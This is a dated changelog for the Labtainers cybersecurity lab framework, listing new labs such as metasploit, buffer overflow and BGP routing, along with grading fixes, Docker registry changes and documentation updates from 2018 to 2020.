  • Handle mysql log timestamp formats in results parsing.

June 15, 2020

  • New base image contianing the Bird open source router
  • Add bird-bgp Border Gateway Protocol lab.
  • Add bird-ospf Open Shortest Path First routing protocol.
  • Improve handling of DNS changes, external access from some containers was blocked in some sites.
  • Add section to Instructor Guide on using Labtainers in environments lacking Internet access.

May 21, 2020

  • Move all repositories to the Docker Hub labtainers registry
  • Support mounts defined in the start.config to allow persistent software installs
  • Change ida lab to use persistent installation of IDA -- new name is ida2
  • Add cgc lab for exploration of over 200 vulnerable services from the DARPA Cyber Grand Challenge
  • Add type_string command to SimLab
  • Add netflow lab for use of NetFlow network traffic analysis
  • Add 64-bit versions of the bufoverflow and the formatstring labs

April 9, 2020

  • Grader failed assessment of CONTAINS and FILE_REGX conditions when wildcards were used for file selection.
  • Include hints for using hexedit in the symlab lab.
  • Add hash_equal operator and hash-goals.py to automated assessment to avoid publishing expected answers in configuration files.
  • Automated assessment for the pcap-lib lab.

April 7, 2020

  • Logs have been moved to $LABTAINER_DIR/logs
  • Other cleanup to permit rebuilds and tests using Jenkins, including use of unique temporary directories for builds
  • Move build support functions out of labutils into build.py
  • Add pcap-lib lab for PCAP library based development of traffic analysis programs

March 13, 2020

  • Add plc-traffic lab for use of GrassMarlin with traffic generated during the lab.
  • Introduce ability to add "tap" containers to collect PCAPs from selected networks.
  • Update GNS3 documentation for external access to containers, and use of dummy_hcd to simulate USB drives.
  • Change kali template to use faux_init rather than attempting to use systemd.
  • Moving distributions (tar files) to box.com
  • Change SimLab use of netstat to not do a dns lookup.

February 26, 2020

  • If labtainer command does not find lab, suggest that user run update-labtainer.sh
  • Add support preliminary support for a network tap component to view all network traffic.
  • Script to fetch lab images to prep VMs that will be used without internet.
  • Provide username and password for nmap-discovery lab.

February 18, 2020

  • Inherit the DISPLAY environment variable from the host (e.g., VM) instead of assuming :0

February 14, 2020

February 11, 2020

  • Update guides to describe remote access to containers withing GNS3 environments
  • Hide selected components and links within GNS3.
  • Figures in the webtrack lab guide were not visible; typos in this and nmap-ssh

February 6, 2020

  • Introduce function to remotely manage containers, e.g., push files.
  • Add GNS3 environment function to simulate insertion of a USB drive.
  • Improve handling of Docker build errors.

February 3, 2020

  • On the metasploit lab, the postgresql service was not running on the victim.
  • Merge the IModule manual content into the Lab Designer guide.
  • More IModule support.

January 27, 2020

  • Introduce initial support for IModules (instructor-developed labs). See docs/imodules.pdf.
  • Fix broken LABTAINER_DIR env variable within update-labtainer
  • Fix access mode on accounting.txt file in ACL lab (had become rw-r-r). Use explicit chmod in fixlocal.sh.

January 14, 2020

  • Port framework and gradelab to Python3 (existing Python2 labs will not change)
    • Use backward compatible random.seed options
    • Hack non-compatable randint to return old values
    • Continue to support python2 for platforms that lack python3 (or those such as the older VM appliance that include python 3.5.2, which breaks random.seed compatability).
    • Add rebuild alias for rebuild.py that will select python2 if needed.
  • Centos-based labs manpages were failing; use mandb within base docker file
  • dmz-lab netmask for DMZ network was wrong (caught by python3); as was IP address of inner gateway in lab manual
  • ghex removed from centos labs -- no longer easily supported by centos 7
  • file-deletion lab must be completed without rebooting the VM, note this in the Lab Manual.
  • Add NO_GW switch to start.config to disable default gateways on containers.
  • Metasploit lab, crashes host VM if runs as privileged; long delays on su if systemd enabled; so run without systemd. Remove use of database from lab manual, configure to use new no_gw switch
  • Update file headers for licensing/terms; add consolidated license file.
  • Modify publish.py to default to use of test registry, use -d to force use of default_registry
  • Revise source control procedures to use different test registry for each branch, and use a premaster branch for final testing of a release.

October 9, 2019

  • Remove dnsmasq from dns component in the dmz-lab. Was causing bind to fail on some installations.

October 8, 2019

  • Syntax error in test registry setup; lab designer info on large files; fetch bigexternal.txt files

September 30, 2019

  • DockerHub registry retrieval again failing for some users. Ignore html prefix to json.

September 20, 2019

  • Assessment of onewayhash should allow hmac operations on file of student's choosing.

September 5, 2019

  • Rebuild metasploit lab, metasploit-framework exhibited a bug. And the labs "treataslocal" file was left out of the move from svn. Fix type in metasploit lab manual.

August 30, 2019

  • Revert test for existence of container directories, they do not always exist.

August 29, 2019

  • Lab image pulls from docker hub failed due to change in github or curl? Catch rediret to cloudflare. Addition of GNS3 support. Fix to dmz-lab dnssec.

July 11, 2019

  • Automated assessment for CentOS6 containers, fix for firefox memory issue, support arbitrary docker create arguments in the start.config file.

June 6, 2019

  • Introduce a Centos6 base, but not support for automated assessment yet

May 23, 2019

  • Automated assessment of setuid-env failed due to typos in field seperators.

May 8, 2019

  • Corrections to Capabilities lab manual

May 2, 2019

  • Acl lab fix to bobstuff.txt permissions. Use explicit chmod in fixlocal.sh
  • Revise student guide to clarify use of stop and -r option in body of the manual.

March 9, 2019

  • The checkwork function was reusing containers, thereby preventing students from eliminating artifacts from previous lab work.
  • Add appendix to the symkey lab to describe the BMP image format.

February 22, 2019

  • The http server failed to start in the vpn and vpn2 labs. Automated assessment removed from those labs until reworked.

January 7, 2019

  • Fix gdblesson automated assessment to at least be operational.

January 27, 2019

  • Fix lab manual for routing-basics2 and fix routing to enable external access to internal web server.

December 29, 2018

  • Fix routing-basics2, same issues as routing-basics, plus an incorret ip address in the gateway resolv.conf

December 5, 2018

  • Fix routing-basics lab, dns resolution at isp and gatway components was broken.

November 14, 2018

  • Remove /run/nologin from archive machine in backups2 -- need general solution for this nologin issue

November, 5, 2018

  • Change file-integrity lab default aid.conf to track metadata changes rather than file modification times

October 22, 2018

  • macs-hash lab resolution verydodgy.com failed on lab restart
  • Notify function failed if notify_cb.sh is missing

October 12, 2018

  • Set ulimit on file size, limit to 1G

October 10, 2018

  • Force collection of parameterized files
  • Explicitly include leafpad and ghex in centos-xtra baseline and rebuild dependent images.

September 28, 2018

  • Fix access modes of shared file in ACL lab
  • Clarify question in pass-crack
  • Modify artifact collection to ignore files older than start of lab.
  • Add quantum computing algorithms lab

September 12, 2018

  • Fix setuid-env grading syntax errors
  • Fix syntax error in iptables2 example firewall rules
  • Rebuild centos labs, move lamp derivatives to use lamp.xtr for waitparam and force httpd to wait for that to finish.

September 7, 2018

  • Add CyberCIEGE as a lab
  • read_pre.txt information display prior to pull of images, and chance to bail.

September 5, 2018

  • Restore sakai bulk download processing to gradelab function.
  • Remove unused instructor scripts.

September 4, 2018

  • Allow multiple IP addresses per network interface
  • Add base image for Wine
  • Add GRFICS virtual ICS simulation

August 23, 2018

  • Add GrassMarlin lab (ICS network discovery)

August 23, 2018

  • Add GrassMarlin lab (ICS network discovery)

August 21, 2018

  • Another fix around AWS authentication issues (DockerHub uses AWS).
  • Fix new_lab_setup.py to use git instead of svn.
  • Split plc-forensics lab into a basic lab and and advanced lab (plc-forensics-adv)

August 17, 2018

  • Transition to git & GitHub as authoritative repo.

August 15, 2018

  • Modify plc-forensics lab assessment to be more general; revise lab manual to reflect wireshark on the Labtainer.

August 15, 2018

  • Add "checkwork" command allowing students to view automated assessment results for their lab work.
  • Include logging of iptables packet drops in the iptables2 and the iptables-ics lab.
  • Remove obsolete instances of is_true and is_false from goal.config
  • Fix boolean evaluation to handle "NOT foo", it had expected more operands.

August 9, 2018

  • Support parameter replacement in results.config files
  • Add TIME_DELIM result type for results.config
  • Rework the iptables lab, remove hidden nmap commands, introduce custom service

August 7, 2018

  • Add link to student guide in labtainer-student directory
  • Add link to student guide on VM desktops
  • Fixes to iptables-ics to avoid long delay on shutdown; and fixes to regression tests
  • Add note to guides suggesting student use of VM browser to transfer artifact zip file to instructor.

August 1, 2018

  • Use a generic Docker image for automated assessment; stop creating "instructor" images per lab.

July 30, 2018

  • Document need to unblock the waitparam.service (by creating flag directory) if a fixlocal.sh script is to start a service for which waitparam is a prerequisite.
  • Add plc-app lab for PLC application firewall and whitelisting exercise.

July 25, 2018

  • Add string_contains operator to goals processing
  • Modify assessment of formatstring lab to account for leaked secret not always being at the end of the displayed string.

July 24, 2018

  • Add SSH Agent lab (ssh-agent)

July 20, 2018

  • Support offline building, optionally skip all image pulling
  • Restore apt/yum repo restoration to Dockerfile templates.
  • Handle redirect URL's from Docker registry blob retrieval to avoid authentication errors (Do not rely on curl --location).

July 12, 2018

  • Add prestop feature to allow execution of designer-specified scripts on selected components prior to lab shutdown.
  • Correct host naming in the ssl lab, it was breaking automated assessment.
  • Fix dmz-lab initial state to permit DNS resolutions from inner network.
  • FILE\REGEX processing was not properly handling multiline searches.
  • Framework version derived from newly rebuilt images had incorrect default value.

July 10, 2018

  • Add an LDAP lab
  • Complete transition to systemd based Ubuntu images, remove unused files
  • Move lab_sys tar file to per-container tmp directory for concurrency.

July 6, 2018

  • All Ubuntu base images replaced with versions based on systemd
  • Labtainer container images in registry now tagged with base image ID & have labels reflecting the base image.
  • A given installation will pull and use images that are consistent with the base images it possesses.
  • If you are using a VM image, you may want to replace that with a newer VM image from our website.
  • New labs will not run without downloading newer base images; which can lead to your VM storing multiple versions of large base images (> 500 MB each).
  • Was losing artifacts from processes that were running when lab was stopped -- was not properly killing capinout processes.

June 27, 2018

  • Add support for Ubuntu systemd images
  • Remove old copy of SimLab.py from labtainer-student/bin
  • Move apt and yum sources to /var/tmp
  • Clarify differences between use of "boolean" and "count_greater" in assessments
  • Extend Add-HOST in start.config to include all components on a network.
  • Add option to new_lab_setup.py to add a container based on a copy of an existing container.

June 21, 2018

  • Set DISPLAY env for root
  • Fix to build dependency handling of svn status output
  • Add radius lab
  • Bug in SimLab append corrected
  • Use svn, where appropriate, to change file names with new_lab_setup.py

June 19, 2018

  • Retain order of containers defined in start.conf when creating terminal with multiple tabs
  • Clarify designer manual to identify path to assessment configuration files.
  • Remove prompt for instructor to provide email
  • Botched error checking when testing for version number
  • Include timestamps of lab starts and redos in the assessment json
  • Add an SSL lab that includes bi-directional authentication and creation of certificates.

June 14, 2018

  • Add diagnostics to parameterizing, track down why some install seem to fail on that.
  • If a container is already created, make sure it is parameterized, otherwise bail to avoid corrupt or half-baked containers.
  • Fix program version number to use svn HEAD

June 15, 2018

  • Convert plain text instructions that appeared in xterms into pdf file.
  • Fix bug in version handling of images that have not yet been pulled.
  • Detect occurance of a container that was created, but not parameterized, and prompt the user to restart the lab with the "-r" option.
  • Add designer utility: rm_svn.py so that removed files trigger an image rebuild.

June 13, 2018

  • Install xterm on Ubuntu 18 systems
  • Work around breakage in new versions of gnome-terminal tab handling

June 11, 2018

  • Add version checking to compare images to the framework.
  • Clarify various lab manuals

June 2, 2018

  • When installing on Ubuntu 18, use docker.io instead of docker-ce
  • The capinout caused a crash when a "sudo su" monitored command is followed by a non-elevated user command.
  • Move routing and resolv.conf settings into /etc/rc.local instead of fixlocal.sh so they persist across start/stop of the containers.

May 31, 2018

  • Work around Docker bug that caused text to wrap in a terminal without a line feed.
  • Extend COMMAND_COUNT to account for pipes
  • Create new version of backups lab that includes backups to a remote server and backs up an entire partition.
  • Alter sshlab instructions to use ssh-copy-id utility
  • Delte /run/nologin file from parameterize.sh to permit ssh login on CentOS

May 30, 2018

  • Extended new_lab_setup.py to permit identification of the base image to use
  • Create new version of centos-log that includes centralized logging.
  • Assessment validation was not accepting "time_not_during" option.
  • Begin to integrate Labtainer Master for managing Labtainers from a Docker container.

May 25, 2018

  • Remove 10 second sleeps from various services. Was delaying xinetd responses, breaking automated tests.
  • Fix snort lab grading to only require "CONFIDENTIAL" in the alarm. Remove unused files from lab.
  • Program finish times were not recorded if the program was running when the lab was stopped.

May 21, 2018

  • Fix retlibc grading to remove duplicate goal, was failing automated assessment
  • Remove copies of mynotify.py from individual labs and lab template, it is has been part of lab_sys/sbin, but had not been updated to reflect fixes made for acl lab.

May 18, 2018

  • Mask signal message from exec_wrap so that segv error message looks right.
  • The capinout was sometimes losing stdout, check command stdout on death of cmd.
  • Fix grading of formatstring to catch segmentation fault message.
  • Add type_function feature to SimLab to type stdout of a script (see formatstring simlab).
  • Remove SimLab limitation on combining single/double quotes.
  • Add window_wait directive to SimLab to pause until window with given title can be found.
  • Modify plc lab to alter titles on physical world terminal to reflect status, this also makes testing easier.
  • Fix bufoverflow lab manual link.

May 15, 2018

  • Add appendix on use of the SimLab tool to simulate user performance of labs for regression testing and lab development.
  • Add wait_net function to SimLab to pause until selected network connections terminate.
  • Change acl automated assessment to use FILE_REGEX for multiline matching.
  • SimLab test for xsite lab.

May 11, 2018

  • Add "noskip" file to force collection of files otherwise found in home.tar, needed for retrieving Firefox places.sqlite.
  • Merge sqlite database with write ahead buffer before extracting.
  • Corrections to lab manual for the symkeylab
  • Grading additions for symkeylab and pubkey
  • Improvements to simlab tool: support include, fix window naming.

May 9, 2018

  • Fix parameterization of the file-deletion lab. Correct error its lab manual.
  • Replace use of shell=True in python scripts to reduce processes and allow tracking PIDs
  • Clean up manuals for backups, pass-crack and macs-hash.

May 8, 2018

  • Handle race condition to prevent gnome-terminal from executing its docker command before an xterm instruction terminal runs its command.
  • Don't display errors when instuctor stops a lab started with "-d".
  • Change grading of nmap-ssh to better reflect intent of the lab.
  • Several document and script fixes suggested by olberger on github.

May 7, 2018

  • Use C-based capinout program instead of the old capinout.sh to capture stdin and stdout. See trunk/src-tool/capinout. Removes limitations associated with use ctrl-C to break monitored programs and the display of passwords in telnet and ssh.
  • Include support for saki bulk_download zip processing to extract seperatly submitted reports, and summarizes missing submits.
  • Add checks to user-provided email to ensure they are printable characters.
  • While grading, if user-supplied email does not match zip file name, proceed to grade the results, but include note in the table reflecting cheating. Require to recover from cases where student enters garbage for an email address.
  • Change telnetlab grading to not look at tcpdump output for passwords -- capinout fix leads to correct character-at-a-time transmission to server.
  • Fix typo in install-docker.sh and use sudo to alter docker dns setting in that script.

April 26, 2018

  • Transition to use of "labtainer" to start lab, and "stoplab" to stop it.
  • Add --version option to labtainer command.
  • Add log_ts and log_range result types, and time_not_during goal operators. Revamp the centos-log and sys-log grading to use these features.
  • Put labsys.tar into /var/tmp instead of /tmp, sometimes would get deleted before expanded
  • Running X applications as root fails after reboot of VM.
  • Add "User Command" man pages to CentOS based labs
  • Fix recent bug that prevented collection of docs files from students
  • Modify smoke-tests to only compare student-specific result line, void of whitespace

April 20, 2018

  • The denyhosts service fails to start the first time, moved start to student_startup.sh.
  • Move all faux_init services until after parameterization -- rsyslog was failing to start on second boot of container. April 19, 2018
  • The acl lab failed to properly assess performance of the trojan horse step.
  • Collect student documents by default.
  • The denyhost lab changed to reflect that denyhosts (or tcp wrappers?) now modifies iptables. Also, the denyhosts service was failing to start on some occasions.
  • When updating Labtainers, do not overwrite files that are newer than those in the archive -- preserve student lab reports.

April 12, 2018

  • Add documentation for the purpose of lab goals, and display this for the instructor when the instructor starts a lab.
  • Correct use of the precheck function when the program is in treataslocal, pass capintout.sh the full program path.
  • Copy instr_config files at run time rather than during image build.
  • Add Designer Guide section on debugging automated assessment.
  • Incorrect case in lab report file names.
  • Unncessary chown function caused instructor.py to sometimes crash.
  • Support for automated testing of labs (see SimLab and smoketest).
  • Move testsets and distrib under trunk

April 5, 2018

  • Revise Firefox profile to remove "you've not use firefox in a while..." message.
  • Remove unnessary pulls from registry -- get image dates via docker hub API instead.

March 28, 2018

  • Use explicit tar instead of "docker cp" for system files (Docker does not follow links.)
  • Fix backups lab use separate file system and update the manual.

March 26, 2018

  • Support for multi-user modes (see Lab Designer User Guide).
  • Removed build dependency on the lab_bin and lab_sys files. Those are now copied during parameterization of the lab.
  • Move capinout.sh to /sbin so it can be found when running as root.

March 21, 2018

  • Add CLONE to permit multiple instances of the same container, e.g., for labs shared by multiple concurrent students.
  • Adapt kali-test lab to provide example of macvlan and CLONE
  • Copy the capinout.sh script to /sbin so root can find it after a sudo su.

March 15, 2018

  • Support macvlan networks for communications with external hosts
  • Add a Kali linux base, and a Metasploitable 2 image (see kali-test)

March 8, 2018

  • Do not require labname when using stop.py
  • Catch errors caused by stray networks and advise user on a fix
  • Add support for use of local apt & yum repos at NPS

February 21, 2018

  • Add dmz-lab
  • Change "checklocal" to "precheck", reflecting it runs prior to the command.
  • Decouple inotify event reporting from use of precheck.sh, allow inotify event lists to include optional outputfile name.
  • Extend bash hook to root operations, flush that bash_history.
  • Allow parameterization of start.config fields, e.g., for random IP addresses
  • Support monitoring of services started via systemctl or /etc/init.d
  • Introduce time delimeter qualifiers to organize a timestamped log file into ranges delimited by some configuration change of interest (see dmz-lab)

February 5, 2018

  • Boolean values from results.config files are now treated as goal values
  • Add regular expression support for identifying artifact results.
  • Support for alternate Docker registries, including a local test registry for testing
  • Msc fixes to labs and lab manuals
  • The capinout monitoring hook was not killing child processes on exit.
  • Kill monitored processes before collecting artifacts
  • Add labtainer.wireshark as a baseline container, clean up dockerfiles

January 30, 2018

  • Add snort lab
  • Integrate log file timestamps, e.g., from syslogs, into timestamped results.
  • Remove undefined result values from intermediate timestamped json result files.
  • Alter the time_during goal assessment operation to associate timestamps with the resulting goal value.

January 24, 2018

  • Use of tabbed windows caused instructor side to fail, use of double quotes.
  • Ignore files in _tar directories (other than .tar) when determining build dependencies.


โŒ